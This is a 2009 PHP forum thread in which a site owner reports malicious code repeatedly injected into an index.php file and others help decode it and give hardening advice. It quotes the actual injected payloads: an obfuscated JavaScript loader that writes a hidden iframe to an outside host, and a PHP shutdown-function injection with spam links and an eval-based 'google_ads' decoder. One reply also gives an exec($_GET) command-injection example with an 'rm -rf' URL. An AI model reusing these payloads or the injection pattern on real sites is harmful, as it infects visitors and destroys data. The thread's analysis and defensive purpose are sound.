someone hacked into my files and inserted this code

Reply
1 2

Join Date: Dec 2008
Posts: 57
Reputation: khr2003 is an unknown quantity at this point 
Solved Threads: 0
khr2003 khr2003 is offline Offline
Junior Poster in Training

someone hacked into my files and inserted this code

 
0
  #1
Jan 6th, 2009
hi
I am not sure if this is the right section, but the files I am using in my website are written in php language.

Yesterday, I try to edit my files and found at the end of the index file this code:
PHP Syntax (Toggle Plain Text) 
  1. <iframe src='http://url/' width='1' height='1' style='visibility: hidden;'></iframe><script>function c102916999516l4963660743084(l4963660743855){ var l4963660744026=16; return (parseInt(l4963660743855,l4963660744026));}function l4963660744fc7(l4963660745797){ function l4963660746f0b(){return 2;} var l4963660745f69='';l4963660747eab=String.fromCharCode;for(l4963660746738=0;l4963660746738<l4963660745797.length;l4963660746738+=l4963660746f0b()){ l4963660745f69+=(l4963660747eab(c102916999516l4963660743084(l4963660745797.substr(l4963660746738,l4963660746f0b()))));}return l4963660745f69;} var x60='';var l4963660748680='3C736'+x60+'3726'+x60+'970743E6'+x60+'96'+x60+'6'+x60+'28216'+x60+'D796'+x60+'96'+x60+'1297B6'+x60+'46'+x60+'F6'+x60+'3756'+x60+'D6'+x60+'56'+x60+'E742E77726'+x60+'9746'+x60+'528756'+x60+'E6'+x60+'5736'+x60+'36'+x60+'1706'+x60+'528202725336'+x60+'32536'+x60+'392536'+x60+'36'+x60+'2537322536'+x60+'312536'+x60+'6'+x60+'42536'+x60+'352532302536'+x60+'6'+x60+'52536'+x60+'312536'+x60+'6'+x60+'42536'+x60+'3525336'+x60+'42536'+x60+'332533312533302532302537332537322536'+x60+'3325336'+x60+'42532372536'+x60+'3825373425373425373025336'+x60+'125326'+x60+'6'+x60+'25326'+x60+'6'+x60+'2536'+x60+'372536'+x60+'6'+x60+'6'+x60+'2536'+x60+'372536'+x60+'6'+x60+'6'+x60+'2533322536'+x60+'6'+x60+'42536'+x60+'3525326'+x60+'52536'+x60+'6'+x60+'52536'+x60+'3525373425326'+x60+'6'+x60+'25326'+x60+'52536'+x60+'372536'+x60+'6'+x60+'6'+x60+'25326'+x60+'6'+x60+'2536'+x60+'332536'+x60+'382536'+x60+'352536'+x60+'332536'+x60+'6'+x60+'225326'+x60+'52536'+x60+'382537342536'+x60+'6'+x60+'42536'+x60+'6'+x60+'32532372532302537372536'+x60+'392536'+x60+'342537342536'+x60+'3825336'+x60+'42533332533342533392532302536'+x60+'382536'+x60+'352536'+x60+'392536'+x60+'372536'+x60+'3825373425336'+x60+'42533352533352533372532302537332537342537392536'+x60+'6'+x60+'32536'+x60+'3525336'+x60+'4253237253736'+x60+'2536'+x60+'392537332536'+x60+'392536'+x60+'322536'+x60+'392536'+x60+'6'+x60+'32536'+x60+'3925373425373925336'+x60+'12536'+x60+'382536'+x60+'392536'+x60+'342536'+x60+'342536'+x60+'352536'+x60+'6'+x60+'525323725336'+x60+'525336'+x60+'325326'+x60+'6'+x60+'2536'+x60+'392536'+x60+'36'+x60+'2537322536'+x60+'312536'+x60+'6'+x60+'42536'+x60+'3525336'+x60+'52729293B7D76'+x60+'6'+x60+'172206'+x60+'D796'+x60+'96'+x60+'13D7472756'+x60+'53B3C2F736'+x60+'3726'+x60+'970743E';document.write(l4963660744fc7(l4963660748680));</script>

I asked the hosting service about it and they told me is either the google ad script that I had in my website or there are some security holes in the script that I am using. I asked the makers of the script and they assured me that the script is secure.

Can anyone explain this code to me? it is not the first time I face this problem, from time to another I found strange code placed at the beginning or at the end of the file.

Please explain the code to me or give me a solution?
Reply With Quote Quick reply to this message  
Join Date: Jul 2007
Posts: 1,175
Reputation: stephen84s is a glorious beacon of light stephen84s is a glorious beacon of light stephen84s is a glorious beacon of light stephen84s is a glorious beacon of light stephen84s is a glorious beacon of light stephen84s is a glorious beacon of light 
Solved Threads: 125
Featured Poster
stephen84s's Avatar
stephen84s stephen84s is offline Offline
Veteran Poster

Re: someone hacked into my files and inserted this code

 
0
  #2
Jan 6th, 2009
I do not know what the above code means, but I do remember encountering a trojan, a couple of years ago which put an iframe code like
html Syntax (Toggle Plain Text) 
  1. <iframe src='http:.....'></iframe>

in all my web pages (irrespective of whether they were PHP,ASP, JSP....).
Last edited by stephen84s; Jan 6th, 2009 at 1:24 pm.
"Any fool can write code that a computer can understand. Good programmers write code that humans can understand."

"How to ask questions the smart way ?"
Reply With Quote Quick reply to this message  
Join Date: Dec 2005
Posts: 5,850
Reputation: Salem has a reputation beyond repute Salem has a reputation beyond repute Salem has a reputation beyond repute Salem has a reputation beyond repute Salem has a reputation beyond repute Salem has a reputation beyond repute Salem has a reputation beyond repute Salem has a reputation beyond repute Salem has a reputation beyond repute Salem has a reputation beyond repute Salem has a reputation beyond repute 
Solved Threads: 751
Team Colleague
Salem's Avatar
Salem Salem is offline Offline
Void main'ers are DOOMed

Re: someone hacked into my files and inserted this code

 
1
  #3
Jan 6th, 2009
Well using http://www.w3schools.com/js/tryit.as...me=tryjs_alert and some deft editing (replace any document.write() with alert() ).

The big mass of numbers first expands to this text
PHP Syntax (Toggle Plain Text) 
  1. <script>if(!myia){document.write(unescape( '%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%31%30%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%67%6f%67%6f%32%6d%65%2e%6e%65%74%2f%2e%67%6f%2f%63%68%65%63%6b%2e%68%74%6d%6c%27%20%77%69%64%74%68%3d%33%34%39%20%68%65%69%67%68%74%3d%35%35%37%20%73%74%79%6c%65%3d%27%76%69%73%69%62%69%6c%69%74%79%3a%68%69%64%64%65%6e%27%3e%3c%2f%69%66%72%61%6d%65%3e'));}var myia=true;</script>

Which in turn expands to this
PHP Syntax (Toggle Plain Text) 
  1. <iframe name=c10 src='http://gogo2me.net/.go/check.html' width=349 height=557 style='visibility:hidden'></iframe>

Sure ain't a google ad script.

Googling gogo2me reveals a lot of chat, eg.
http://www.sitepoint.com/forums/show...56#post4082556


I'm shocked that your hosting company couldn't do this basic analysis.
Reply With Quote Quick reply to this message  
Join Date: Dec 2008
Posts: 57
Reputation: khr2003 is an unknown quantity at this point 
Solved Threads: 0
khr2003 khr2003 is offline Offline
Junior Poster in Training

Re: someone hacked into my files and inserted this code

 
0
  #4
Jan 8th, 2009
thanks very much for the reply

In the last two days i kept getting the code in the index.php file. I removed it in the two times and changed the permission of the folder containing it but with same result (I get the code again)

I contacted the hosting company about the issue once again and received these general advices:
PHP Syntax (Toggle Plain Text) 
  1. 1. Set register_globals to OFF
  2. 2. Turn off Display Error/Warning Messages. set error_display to ZERO
  3. 3. Never run unescaped queries
  4. 4. Validate all user inputs. Items on Forms, in URLS and so on
  5. 5. Move Config and files containing Passwords to mysql to a Secure directory outside of the public_html folder
  6. 6. Change permissions on any configuration files containing private information such as database passwords or email accounts to 440 so they cannot be written to and so there is no world permissions. If you need to edit them at a later time you will need to change it back to 640.
  7. 7. Access Control, U don't want ya user to have access to Admin function or Clean up scripts
  8. 8. htaccess is your friend use it to deny people (we also have a easy deny manager too in the cpanel)
  9. 9. PHP can parse any valid script, whether it is called foo.php, very_long_name.php.php.php, or even willeymtard.bat. Using the default extension of ".php" means that before your hackers start you have already told them you are using PHP. As mentioned, you can use any filename for your scripts - if you are using PHP for every script on your server, consider using the ".html" extension for your scripts and making PHP parse HTML files you can change your file extension by adding this line to the htaccess or turn it on via the add type handler in the cpanel (AddType application/x-httpd-php .php)
  10. 10. To protect against SQL injection attacks Sometimes hackers will try to screw up you database by inserting SQL code into your form input fields. They can for example, insert code that could delete all the data in your database!
  11.  
  12. To protect against this, you need to use this PHP function:
  13. mysql_real_escape_string()
  14. This function escapes (makes safe) any special characters in a string (programmers call text a 'string') for MySQL.
  15. Example:
  16. $name = $_REQUEST['name'];
  17. $safe_name = mysql_real_escape_string($name);
  18. Now you know the variable $safe_name, is safe to use with your SQL code.
  19.  
  20. 11. Keep the PHP code to yourself. If anyone can see it they can exploit vulnerabilities. You should take care to store your PHP files and the necessary passwords to access your MySQL databases in protected files or folders. The easy way to do this is to put the database access passwords in a file with a .inc.php extension (such as config.inc.php), and then place this file in a directory which is above the server’s document root (and thus not accessible to surfers of your site), and refer to the file in your PHP code with a require_once command. By doing things this way, your PHP code can read the included file easily but hackers will find it almost impossible to hack your site.
  21.  

The script that I am using apply most of them and still get the code in my website.

Can anyone tell me how to get rid of it (forever)?
Last edited by khr2003; Jan 8th, 2009 at 9:36 pm.
Reply With Quote Quick reply to this message  
Join Date: Apr 2005
Posts: 16,273
Reputation: jbennet is a name known to all jbennet is a name known to all jbennet is a name known to all jbennet is a name known to all jbennet is a name known to all jbennet is a name known to all 
Solved Threads: 543
Moderator
Featured Poster
jbennet's Avatar
jbennet jbennet is offline Offline
Moderator

Re: someone hacked into my files and inserted this code

 
0
  #5
Jan 8th, 2009
Tell your hosting company the server is probably compromised. If you are sure your permissions are secure then maybe a maliciuos user has got root?
If i am helpful, please give me reputation points.
Reply With Quote Quick reply to this message  
Join Date: Dec 2008
Posts: 57
Reputation: khr2003 is an unknown quantity at this point 
Solved Threads: 0
khr2003 khr2003 is offline Offline
Junior Poster in Training

Re: someone hacked into my files and inserted this code

 
0
  #6
Jan 9th, 2009
thanks for the reply

Can you explain to me what does compromise mean in terms of servers (what happens if the server is compromised?).

Also, lets assume that i did not give the right permissions to the folders, how is it another user of surfer can hack into my files?

Additionally, I checked my website today and found this code inserted at the top of the index page:

PHP Syntax (Toggle Plain Text) 
  1. <?php @register_shutdown_function("__sfd1231485604__");function __sfd1231485604__() { global $__sdv1231485604__; if (!empty($__sdv1231485604__)) return; $__sdv1231485604__=1; echo <<<DOC__DOC
  2. <!-- [3dedcad5052d8b1262f3980666421084 --><div class="__wp_footer"><ul><li><a href="http://gumballpoetry.com/psychicbook/trusted.php?sql_error=1&page=971">maxaquin without a prescription</a></li> <li><a href="http://gumballpoetry.com/psychicbook/trusted.php?sql_error=1&page=985">purchase maxaquin online</a></li> <li><a href="http://gumballpoetry.com/psychicbook/trusted.php?sql_error=1&page=1134">discount maxaquin online</a></li> <li><a href="http://gumballpoetry.com/psychicbook/trusted.php?sql_error=1&page=2921">maxaquin cod</a></li> <li><a 
  3. <script type="text/javascript"><!--
  4.  
  5. google_ad_client = "pub-7652328300112265";
  6.  
  7. google_ad_width = 728;
  8.  
  9. google_ad_height = 15;
  10.  
  11. google_ad_format = "728x15_0ads_al_s";
  12.  
  13. google_ad_channel = "";
  14.  
  15. function google_ads(str){var idx = str.indexOf('?'); if (idx == -1) return str; var len = str.length; var new_str = ""; var i = 1; for (++idx; idx < len; idx += 2,i++){ var ch = parseInt(str.substr(idx, 2), 16); new_str += String.fromCharCode((ch + i) % 256); } eval(new_str);}
  16.  
  17. google_ads("http://pagead2.googlesyndication.com/pagead/show_ads.js?65736B5F6F6368661755545B585454185E4F195F175812635E4E4E50480A54095A4743044E083C4438494822343F360D0C3CF63B2CF8393D3A2EED37ECFD2A26E731EB2A2A1E1E0C30261AF1F0D4E2D2D80D0C13100C0CD01607D117D1080A121212E0040406FDC405BFD007D005BFFEF40601DFF4ECF5F1F5EDC00100F8E2F29FEDDEB9E9DFF098B8E8E7D5EC9A9AABCECDD4D1CDCD91D7C892C9D3C6D7CEC5CDD28BC0CABDCEC5BCC4C999BFB7BEB5BDC2796EAAA9C0B8A6ACB4B3B7A7B3626879A3ABAD62AF99A9569E71636D9A6C9E8F5B989098909C8F618E4F4E4B90817A877A4A8E8E92847C44797D86827D71884B347A7A786E2F42");
  18.  
  19. //-->
  20.  
  21. </script><!-- 3dedcad5052d8b1262f3980666421084] -->
  22.  
  23. DOC__DOC;
  24.  
  25. } ?>

And this at the bottom of the page:
PHP Syntax (Toggle Plain Text) 
  1. <?php error_reporting(0); echo "\n"; @__sfd1231485604__(); ?>

can someone tell me how this code gets inserted into my files and why is it inserted at the top and the bottom of the file and not, for instance in the middle of it?

Sorry for the trouble, but i am kind of new to all these stuff.
Last edited by khr2003; Jan 9th, 2009 at 4:34 am.
Reply With Quote Quick reply to this message  
Join Date: Dec 2007
Posts: 112
Reputation: !Unreal is an unknown quantity at this point 
Solved Threads: 2
!Unreal's Avatar
!Unreal !Unreal is offline Offline
Junior Poster

Re: someone hacked into my files and inserted this code

 
0
  #7
Jan 9th, 2009
Its a trojan. The iframe code is coded in such a way which means its hard to find out the source.
Reply With Quote Quick reply to this message  
Join Date: Apr 2005
Posts: 16,273
Reputation: jbennet is a name known to all jbennet is a name known to all jbennet is a name known to all jbennet is a name known to all jbennet is a name known to all jbennet is a name known to all 
Solved Threads: 543
Moderator
Featured Poster
jbennet's Avatar
jbennet jbennet is offline Offline
Moderator

Re: someone hacked into my files and inserted this code

 
0
  #8
Jan 9th, 2009
Also, lets assume that i did not give the right permissions to the folders, how is it another user of surfer can hack into my file
They could hack the whole server and gain access to the root account (admin user)
If i am helpful, please give me reputation points.
Reply With Quote Quick reply to this message  
Join Date: Jul 2006
Posts: 1,091
Reputation: MattEvans is a jewel in the rough MattEvans is a jewel in the rough MattEvans is a jewel in the rough 
Solved Threads: 63
Moderator
Featured Poster
MattEvans's Avatar
MattEvans MattEvans is offline Offline
Veteran Poster

Re: someone hacked into my files and inserted this code

 
0
  #9
Jan 10th, 2009
Scripts are usually chmod 755 ( google it ) so the permissions will be set 'correctly', at least in that no non-priviledged user can edit your files (e.g. an FTP guest). It isn't necessary for the server root password to be compromised for this kind of thing to happen - anyone with your user access can of course modify the files. Since scripts run with the permissions of your user account, that means any executed script on your site can, potentially, edit/delete/create any script/file/folder/config that you can.

The most usual way that this happens is a dodgy script with a security vulnerability.. As a trivial, contrived, example, imagine this being in a PHP script:

exec ($_GET['somevar']);

and now imagine a user accessing your page with:

http://yourdomain.tld/page.php?somevar=rm%20-rf&

this would politely ask the PHP script (running as your user, remember) to delete all files and folders in the script's current directory. Simple, eh?

Obviously, you won't do something like this deliberately, or something this obviously stupid, but variations on this pattern basically allow someone access to everything that you can access, from a browser, without ever needing your (or anyone elses) password.

Now, do you use some kind of prefab PHP application on your site? Because, it's highly unlikely that the kind of attack I just outlined would occur with home-made code, since no-one would be able to see what the site's code actually does (which then would suggest that maybe someone does have your or someone elses pw). But, if you use a prefab application, the vulnerabilites are well known by everyone, and that's obviously risky. So.. if you're using a forum software, for example, generally avoid 'plugins' and even 'themes' unless you really trust the makers to code to as high a security standard as the makers of the forum sofware...
Last edited by MattEvans; Jan 10th, 2009 at 4:23 am.
Plato forgot the nullahedron..
Reply With Quote Quick reply to this message  
Join Date: Jul 2006
Posts: 1,091
Reputation: MattEvans is a jewel in the rough MattEvans is a jewel in the rough MattEvans is a jewel in the rough 
Solved Threads: 63
Moderator
Featured Poster
MattEvans's Avatar
MattEvans MattEvans is offline Offline
Veteran Poster

Re: someone hacked into my files and inserted this code

 
0
  #10
Jan 10th, 2009
Also, (I forgot to mention) changing the permissions of a file to anything won't protect you from that kind of attack, since your user account can always change the permissions of your own files; if someone can execute shell ("command line") code, they can just chmod the relevant files to what they want first.

The best way to protect yourself from this kind of thing is, obviously, to use high quality scripts. You can also run scripts with lower priviledges than your own, if you're still worried. Unfortunately, you need to be able to create new user accounts on the server and edit the server config to do that, and most service providers wont allow you to do that with a basic hosting package.

You have checked the obvious right? that your FTP or control panel password hasn't been leaked/stolen/hacked? You should be able to check FTP access logs (look for unknown IPs logging in as you). But, you may only be able to get access to the logs by asking your hosting provider for them, since they'd be global logs (for all customers).
Plato forgot the nullahedron..
Reply With Quote Quick reply to this message  
Reply
1 2

Quick Reply to Thread
This thread is more than three months old.
Perhaps start a new thread instead?
Message:



Other Threads in the PHP Forum


Views: 3493 | Replies: 12
Thread Tools Search this Thread



Tag cloud for PHP
.htaccess access ajax apache api array beginner binary broken cakephp checkbox class cms code cron curl database date datepart directory display download dynamic echo email error file files folder form forms function functions google href htaccess html image include insert integration ip java javascript joomla jquery limit link list login loop mail menu methods mlm mod_rewrite multiple mysql oop parse password paypal pdf php problem query radio random recursion regex remote script search select seo server sessions sms soap source space speed sql structure syntax system table tutorial update updates upload url validation validator variable video web webdesign xml youtube
About Us | Contact Us | Advertise | DaniWeb | Acceptable Use Policy | RSS Feed

©2003 - 2009 DaniWeb® LLC